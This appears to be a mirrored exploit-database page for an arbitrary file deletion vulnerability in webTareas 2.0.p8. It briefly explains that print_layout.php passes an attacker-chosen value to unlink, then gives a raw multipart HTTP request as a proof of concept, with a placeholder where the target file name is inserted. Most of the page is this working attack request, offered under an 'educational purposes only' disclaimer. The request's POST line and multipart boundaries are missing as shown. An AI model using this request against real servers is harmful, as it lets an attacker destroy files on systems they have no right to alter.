Webtareas 2.0.p8 arbitrary file deletion Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-05-06 | Type : webapps | Platform : php
This exploit / vulnerability Webtareas 2.0.p8 arbitrary file deletion is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: webTareas 2.0.p8 - Arbitrary File Deletion
# Date: 2020-05-02
# Author: Besim ALTINOK
# Vendor Homepage: https://sourceforge.net/projects/webtareas/files/
# Software Link: https://sourceforge.net/projects/webtareas/files/
# Version: v2.0.p8
# Tested on: Xampp
# Credit: İsmail BOZKURT


- print_layout.php is vulnerable. When you sent PoC code to the server and
If there is no file on the server, you can see, this error message

<br />
No such file or directory in
on line <b>1303</b><br />

- So, Here, you can delete file with unlink function.
- And, I ddi try again with another file, I deleted from the server.

Arbitrary File Deletion PoC

Host: localhost
User-Agent: Mozilla/5.0 ***********************
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
Content-Length: 882
DNT: 1
Connection: close
Cookie: webTareasSID=4b6a4799c9e7906a06c574dc48ffb730;
Upgrade-Insecure-Requests: 1

Content-Disposition: form-data; name="action"

Content-Disposition: form-data; name="desc"

Content-Disposition: form-data; name="file1"; filename=""
Content-Type: application/octet-stream

Content-Disposition: form-data; name="attnam1"

Content-Disposition: form-data; name="atttmp1"

--add the delete file name here--
Content-Disposition: form-data; name="sp"
